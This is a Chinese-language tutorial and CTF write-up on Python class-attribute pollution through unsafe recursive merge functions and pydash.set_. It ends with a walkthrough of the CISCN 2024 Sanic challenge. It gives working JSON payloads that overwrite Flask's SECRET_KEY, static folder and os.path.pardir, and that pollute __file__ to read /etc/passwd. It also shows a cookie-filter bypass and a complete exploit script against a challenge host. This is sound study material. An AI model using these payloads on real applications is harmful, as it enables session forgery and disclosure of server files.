# python 原型链污染
# py 原型链污染基础原理:
(Python 则是对类属性值的污染)
Python原型链污染是一种通过修改对象原型链中的属性,导致程序行为偏离预期的攻击技术。其核心原理与JavaScript原型链污染类似,但实现方式因语言特性而有所差异。
*****Python则是对类属性值的污染
原型继承特性
Python中每个对象通过__class__属性指向其所属类,类通过__base__属性指向父类。当访问对象属性时,若当前对象/类中未定义,会沿原型链向上查找14。
污染条件
需要存在递归合并函数(如merge)且未对特殊属性过滤
class Config: | |
is_admin = False | |
def set_config(cls, key, value): | |
setattr(cls, key, value) | |
def get_config(cls, key): | |
return getattr(cls, key, None) | |
instance=Config() | |
print(instance.is_admin) #False | |
setattr(instance,'is_admin','True') | |
print(instance.is_admin) #True |
这是一个实例化的对象,我在 setattr 函数后面讲 is_admin 改成 True,这个只是在这个对象中实现了管理员,如果可以的话,将所有实例化的对象都改成 True 更好,我们可以通过一个例子来了解一下:
from flask import Flask, request, jsonify | |
class Config: | |
is_admin = False # 默认用户不是管理员 | |
def set_config(cls, key, value): | |
setattr(cls, key, value) | |
def get_config(cls, key): | |
return getattr(cls, key, None) | |
app = Flask(__name__) | |
@app.route('/update_config', methods=['POST']) | |
def update_config(): | |
data = request.json | |
for key, value in data.items(): | |
Config.set_config(Config,key, value) | |
return jsonify({"status": "success", "config": data}) | |
@app.route('/check_admin', methods=['GET']) | |
def check_admin(): | |
is_admin = Config.get_config(Config,'is_admin') | |
return jsonify({"is_admin": is_admin}) | |
if __name__ == '__main__': | |
app.run(debug=True) |
这里有两个路由:
一个设置 config 对象的 update_config 路由,一个是检查 is_admin 是不是 True 的路由
先设置值
然后再检查
发现是可以修改对象的
我修改的是类对象,不是实例化的东西,相当于我直接将那个类里面的 is_admin=False 改成了 is_admin=True
但是一般实战中更经常看到的是 merge 的合并函数:
class father: | |
secret = "hello" | |
class son_a(father): | |
pass | |
class son_b(father): | |
pass | |
def merge(src, dst): | |
for k, v in src.items(): | |
if hasattr(dst, '__getitem__'): | |
if dst.get(k) and type(v) == dict: | |
merge(v, dst.get(k)) | |
else: | |
dst[k] = v | |
elif hasattr(dst, k) and type(v) == dict: | |
merge(v, getattr(dst, k)) | |
else: | |
setattr(dst, k, v) | |
instance = son_b() | |
payload = { | |
"__class__" : { | |
"__base__" : { | |
"secret" : "world" | |
} | |
} | |
} | |
print(son_a.secret)#hello | |
print(instance.secret)#hello | |
merge(payload, instance)#hello | |
print(son_a.secret)#hello | |
print(instance.secret)#hello |
难理解的就是
def merge(src, dst): | |
for k, v in src.items():#k 和 v 都是 src 的内容,即 k 是键,v 是值 | |
if hasattr(dst, '__getitem__'): #hassttr 函数是确定 dst 是否含有__getitem__这个属性 | |
if dst.get(k) and type(v) == dict: | |
merge(v, dst.get(k)) | |
else: | |
dst[k] = v | |
elif hasattr(dst, k) and type(v) == dict: | |
merge(v, getattr(dst, k))#getattr 是获取这个属性 | |
else: | |
setattr(dst, k, v) |
第一次迭代是将 payload 和 instance 传进 merge,k 和 v 是键值对
k=__class__
v={'__base__': {'secret': 'world'}}
没有这个__getitem__属性直接往下走
到这里
dst 还是 son_b 类(实例化的)
所有类都有__class__属性
原因如下:
每个 Python 对象都有一个特殊的 __class__ 属性,这是 Python 内部用来表示对象的 类 的机制。这个属性是 Python 对象模型的一部分,它帮助解释和理解对象是如何与类关联的。
__class__ 的作用
__class__ 是一个 指向类的引用,它表示一个对象是哪个类的实例。通过它,我们可以获取一个对象的类型(即它所属的类)。所有的对象,包括实例和类本身,都有这个属性。
所以往下到
merge(v, getattr(dst, k))#getattr 是获取这个属性 |
merge(v, getattr(dst, k))#getattr是获取这个属性
就成了:
merge("{'__base__': {'secret': 'world'}}",son_b); | |
为什么不是__class__,因为__class__就是指向它本身 |
第二次迭代,依旧没有__getitem__属性
elif hasattr(dst, k) and type(v) == dict: |
son_b.__base__==father这个是类的继承链
所以son_b是由这个属性的
type(son_b)也不用说,属性字典
所以执行这行代码
第三次迭代:
elif hasattr(dst, k) and type(v) == dict:
一样有secret这个属性,但是v不再是字典了
setattr(dst, k, v)
执行这条语句
setattr(father, "secret", "world")
至此污染成功
#
# 利用:关键信息替换
# flask 密钥替换:
如果我们可以对密钥进行替换,赋值为我们想要的,我们就可以进行任意的session伪造,这里因为secret_key是在当前入口文件下面的,所以我们可以直接通过`__init__.__globals__`获取全局变量,然后通过app.config["SECRET_KEY"]来进行污染
from flask import Flask,request | |
import json | |
app = Flask(__name__) | |
def merge(src, dst): | |
# Recursive merge function | |
for k, v in src.items(): | |
if hasattr(dst, '__getitem__'): | |
if dst.get(k) and type(v) == dict: | |
merge(v, dst.get(k)) | |
else: | |
dst[k] = v | |
elif hasattr(dst, k) and type(v) == dict: | |
merge(v, getattr(dst, k)) | |
else: | |
setattr(dst, k, v) | |
class cls(): | |
def __init__(self): | |
pass | |
instance = cls() | |
@app.route('/',methods=['POST', 'GET']) | |
def index(): | |
if request.data: | |
merge(json.loads(request.data), instance) | |
return "[+]Config:%s"%(app.config['SECRET_KEY']) | |
app.run(host="0.0.0.0") |
我们并不知道 secretkey 是什么,所以如果能够污染我们就可以实现任意的 session 伪造
{ | |
"__init__" : { | |
"__globals__" : { | |
"app" : { | |
"config" : { | |
"SECRET_KEY" :"Polluted~" | |
} | |
} | |
} | |
} | |
} |
# _got_first_request:
用于判定是否某次请求为子Flask启动后第一次请求,是Flask.got_first_request函数的返回值,此外还会影响装饰器app.before_first_request的调用,而_got_first_request值为假时才会调用:
所以如果我们想调用第一次访问前的请求,还想要在后续请求中进行使用的话,我们就需要将_got_first_request从true改成false然后就能够在后续访问的过程中,仍然能够调用装饰器app.before_first_request下面的可用信息。
代码样例是:
from flask import Flask,request | |
import json | |
app = Flask(__name__) | |
def merge(src, dst): | |
# Recursive merge function | |
for k, v in src.items(): | |
if hasattr(dst, '__getitem__'): | |
if dst.get(k) and type(v) == dict: | |
merge(v, dst.get(k)) | |
else: | |
dst[k] = v | |
elif hasattr(dst, k) and type(v) == dict: | |
merge(v, getattr(dst, k)) | |
else: | |
setattr(dst, k, v) | |
class cls(): | |
def __init__(self): | |
pass | |
instance = cls() | |
flag = "Is flag here?" | |
@app.before_first_request | |
def init(): | |
global flag | |
if hasattr(app, "special") and app.special == "U_Polluted_It": | |
flag = open("flag", "rt").read() | |
@app.route('/',methods=['POST', 'GET']) | |
def index(): | |
if request.data: | |
merge(json.loads(request.data), instance) | |
global flag | |
setattr(app, "special", "U_Polluted_It") | |
return flag | |
app.run(host="0.0.0.0") |
payload={ | |
"__init__":{ | |
"__globals__":{ | |
"app":{ | |
"_got_first_request":False | |
} | |
} | |
} | |
} |
原因是
@app.before_first_request | |
def init(): | |
global flag | |
if hasattr(app, "special") and app.special == "U_Polluted_It": | |
flag = open("flag", "rt").read() |
# _static_url_path:
当 python 指定了 static 静态目录以后,我们再进行访问就会定向到 static 文件夹下面的对应文件而不会存在目录穿梭的漏洞,但是如果我们想要访问其他文件下面的敏感信息,我们就需要污染这个静态目录,让他自动帮我们实现定向
#static/index.html
<html>
<h1>hello</h1>
<body>
</body>
</html>
@app.route('/',methods=['POST', 'GET'])
def index():
if request.data:
merge(json.loads(request.data), instance)
return "flag in ./flag but heres only static/index.html"
payload={
"__init__":{
"__globals__":{
"app":{
"_static_folder":"./"
}
}
}
}
# os.path.pardir:
套一下师傅的示例脚本来学习一下:
#app.py
from flask import Flask,request
import json
app = Flask(__name__)
def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
class cls():
def __init__(self):
pass
instance = cls()
@app.route('/',methods=['POST', 'GET'])
def index():
if request.data:
merge(json.loads(request.data), instance)
return "flag in ./flag but heres only static/index.html"
app.run(host="0.0.0.0")
我们进行目录穿梭进行访问发现报了 500 的错误:
是因为:
# pseudocode from jinja2/templating.py | |
if os.path.sep in filename or os.path.pardir in filename: | |
raise TemplateNotFound |
我们需要把 os.path.pardir
( ".."
)改成别的字符串,就绕过检测,模板引擎就会正常读取上级目录里的文件
payload:
{
"__init__": {
"__globals__": {
"os": {
"path": {
"pardir": "," // 把 .. 换成 ,
}
}
}
}
}
就可以直接…/…/…/flag 直接获取 flag 了
# 题目解析
# 2024ciscn sanic
给的提示:
/admin 和 /src 的敏感目录
from sanic import Sanic | |
from sanic.response import text, html | |
from sanic_session import Session | |
import pydash | |
# pydash==5.1.2 | |
class Pollute: | |
def __init__(self): | |
pass | |
app = Sanic(__name__) | |
app.static("/static/", "./static/") | |
Session(app) | |
@app.route('/', methods=['GET', 'POST']) | |
async def index(request): | |
return html(open('static/index.html').read()) | |
@app.route("/login") | |
async def login(request): | |
user = request.cookies.get("user") | |
if user.lower() == 'adm;n': | |
request.ctx.session['admin'] = True | |
return text("login success") | |
return text("login fail") | |
@app.route("/src") | |
async def src(request): | |
return text(open(__file__).read()) | |
@app.route("/admin", methods=['GET', 'POST']) | |
async def admin(request): | |
if request.ctx.session.get('admin') == True: | |
key = request.json['key'] | |
value = request.json['value'] | |
if key and value and type(key) is str and '_.' not in key: | |
pollute = Pollute() | |
pydash.set_(pollute, key, value) | |
return text("success") | |
else: | |
return text("forbidden") | |
return text("forbidden") | |
if __name__ == '__main__': | |
app.run(host='0.0.0.0') |
我们发现 /login 路由里面,当我们 cookie 穿的 user 的值为 adm;n 是,为给我们设置为 true,总所周知,cookie 中的;被视为分割符,正常传肯定失败,那我们就要去想想怎么绕过,
既然是 sanic 的框架,我们就去搜 sanic 框架里的源码(cookies)
发现在 sanic/cookies/request.py 中的_unquote 函数存在八进制解码的逻辑,且开头会去掉双引号于是我们找到了绕过的方法 “\141\144\155\073\156”
# 绕过 cookie 将;当分割符,也可以 adm\073n
登陆成功
# 分析:
然后主要的就是
@app.route("/src") | |
async def src(request): | |
return text(open(__file__).read()) |
那么我们的目标就很明确了,我们得修改__file__的值,来读不同的文件,先试试/etc/passwd
但是得看代码是怎么写的
@app.route("/admin", methods=['GET', 'POST']) | |
async def admin(request): | |
if request.ctx.session.get('admin') == True: | |
key = request.json['key'] | |
value = request.json['value'] | |
if key and value and type(key) is str and '_.' not in key: | |
pollute = Pollute() | |
pydash.set_(pollute, key, value) | |
return text("success") | |
else: | |
return text("forbidden") | |
return text("forbidden") |
从这里
pydash.set_(pollute, key, value)
到
def set_(obj, path, value): | |
return set_with(obj, path, value) |
再到:
def update_with(obj, path, updater, customizer=None): # noqa: C901 | |
if not callable(updater): | |
updater = pyd.constant(updater) | |
if customizer is not None and not callable(customizer): | |
call_customizer = partial(callit, clone, customizer, argcount=1) | |
elif customizer: | |
call_customizer = partial(callit, customizer, argcount=getargcount(customizer, maxargs=3)) | |
else: | |
call_customizer = None | |
default_type = dict if isinstance(obj, dict) else list | |
tokens = to_path_tokens(path) | |
if not pyd.is_list(tokens): # pragma: no cover | |
tokens = [tokens] | |
last_key = pyd.last(tokens) | |
if isinstance(last_key, PathToken): | |
last_key = last_key.key | |
target = obj | |
for idx, token in enumerate(pyd.initial(tokens)): | |
if isinstance(token, PathToken): | |
key = token.key | |
default_factory = pyd.get(tokens, [idx + 1, "default_factory"], default=default_type) | |
else: | |
key = token | |
default_factory = default_type | |
obj_val = base_get(target, key, default=None) | |
path_obj = None | |
if call_customizer: | |
path_obj = call_customizer(obj_val, key, target) | |
if path_obj is None: | |
path_obj = default_factory() | |
base_set(target, key, path_obj, allow_override=False) | |
try: | |
target = base_get(target, key, default=None) | |
except TypeError as exc: # pragma: no cover | |
try: | |
target = target[int(key)] | |
_failed = False | |
except Exception: | |
_failed = True | |
if _failed: | |
raise TypeError(f"Unable to update object at index {key!r}. {exc}") | |
value = base_get(target, last_key, default=None) | |
base_set(target, last_key, callit(updater, value)) | |
return obj |
跟 tokens = to_path_tokens (path) 到:
def to_path_tokens(value): | |
"""Parse `value` into :class:`PathToken` objects.""" | |
if pyd.is_string(value) and ("." in value or "[" in value): | |
# Since we can't tell whether a bare number is supposed to be dict key or a list index, we | |
# support a special syntax where any string-integer surrounded by brackets is treated as a | |
# list index and converted to an integer. | |
keys = [ | |
PathToken(int(key[1:-1]), default_factory=list) | |
if RE_PATH_LIST_INDEX.match(key) | |
else PathToken(unescape_path_key(key), default_factory=dict) | |
for key in filter(None, RE_PATH_KEY_DELIM.split(value)) | |
] | |
elif pyd.is_string(value) or pyd.is_number(value): | |
keys = [PathToken(value, default_factory=dict)] | |
elif value is UNSET: | |
keys = [] | |
else: | |
keys = value | |
return keys |
RE_PATH_KEY_DELIM = re.compile(r"(?<!\)(?:\\)*.|([\d+])") |
发现\.会当作.进行处理,可以绕过题目的过滤,而.会作为.的转义不进行分割
__init__\\\.__globals__
等于
__init__\\.__globals__
等于
__init__.__globals__
所以用这 payload 读文件:
{"key":"__class__\\\\.__init__\\\\.__globals__\\\\.__file__","value":"/etc/passwd"} //24bcbd0192e591d6ded1_flag
污染成功,但是不知道 flag 的文件名,注意到注册的 static 路由会添加 DirectoryHandler 到 route
跟进 static
给了注释,可以翻译一下
directory_view(bool,optional):这是一个可选的布尔函数,用于决定当暴露一个目录是是否先是目录结构给用户,耳式按照其他预设方式处理目录访问亲环球,当设置为True,用户界面或API相应可能会改为先是目录的内容列表,类似于你在文件浏览器中看到的文件和子目录列表。
directory_handler(Optional[DirectoryHandler],optional):这是一个更高级的配置选项,允许你提供一个自定义的DirectoryHandler实例.DirevotoryHandler是一个类或接口,定义了如何处理目录请求的具体行为,通过传入一个自定义的DirectortHandler实例,你可以控制和扩展应用程序处理目录时的默认行为。这包括但不小于权限控制,目录遍历逻辑,文件预览或其他任何自定义逻辑。Optional意味着这个参数是可以忽略的,如果不提供,默认的目录处理逻辑将会被使用。
大概就是当 directory_view 为 True 时,会开启列目录功能,directory_handler 中可以获取指定的目录跟进 directory_handler
发现 directory_handler 是对 DirectoryHandler 类的实例化:
跟进 directory_view 这个
跟进这个类发现 directory_view 和 directory 所以只要我们将 directory 污染为根目录,directory_view 污染为 True,就可以看到根目录的所有文件了,这边我们可以开始操作了
那么就是怎么找到这两个参数了,才能去修改
# 修改 directory_view
再 sanic 框架中通过 app.route.name_index [‘xxxxx’] 来获取注册的路由,我们可以直接输出看一下
# print(app.router.name_index.keys())
但是我们发现没有找到这个路由的名字 name,那么我们可以通过 print (app.router.name_index.keys ()) 这条命令找到这些路由的默认名字
还能用
#### print(app.router.name_index['__mp_main__.static'])
然后就是得找到哪里能找到调用到 DirectoryHandler 里呢?
我们可以全局搜索一下在哪里有调用这个 name_index 方法
找到这个方法给个断点
找到这个 directory_view 的属性,可以
找到这个属性了,就可以直接将其设置值了
{"key":"__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory_view","value": "True"} |
注意这里不能用 [] 来包裹其中的索引,污染和直接调用不同,我们需要用。来连接,而
__mp_main.static
是一个整体,不能分开,我们可以用两个反斜杠来转义就够了
可以看到是污染成功了,访问 /static/,可以看到该目录下的文件
# 修改 directory 的值
接下来就是设置 directory 就够了,我们先获取他的值
{"key":"__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory","value": "True"} |
但是发现在我 /static/ 时候确实 500 错误
发现这里的值不能进行字符串的赋值,
回到原地就是
发现是 parts 的值是 directory 的值
我可以找到他的源码,看看它是怎么赋值的,或者直接本地调试是什么类型的
本地的环境好像找不到_parts 这东西了,(可能版本太高了)
http://127.0.0.1:8000/src?cmd=print(app.router.name_index['__mp_main__.static'].handler.keywords['directory_handler'].directory._parts)
会报错
那就看一下别人的复现吧
可以看到这里是获取一个 Path 对象我们跟进 Path 对象里
可以看到 parts 的值最后是给了_parts 这个属性,我们访问这个属性看看:
看到这是一个 list, 那么这里很明显我们就可以直接污染了
到此,我们两个污染点的污染链都已经明确,下面给出 paylaod:
#开启列目录功能
{"key":"__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory_view","value": true}
#将目录设置在根目录下{"key":"__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory._parts","value": ["/"]}
至此,就可以直接打了。(呜呜呜呜呜,终于能复现一个国赛的 web 题了)
exp:
import requests | |
base = 'http://a78602e2-d016-4f57-8017-f29321897c8b.challenge.ctf.show' | |
s = requests.Session() | |
s.cookies.update({ | |
'user': '"adm\\073n"' | |
}) | |
s.get(base + '/login') | |
data = { | |
"key": "__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory_view", | |
"value": "true"} | |
data1 = { | |
"key": "__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory._parts", | |
"value": ["/"]} | |
r = s.post(base + '/admin', json=data) | |
print(r.text) | |
r = s.post(base + '/admin', json=data1) | |
print(r.text) |
参考链接:CISCN2024-WEB-Sanic gxngxngxn - gxngxngxn - 博客园
从 CISCN2024 的 sanic 引发对 python “原型链” 的污染挖掘 - 先知社区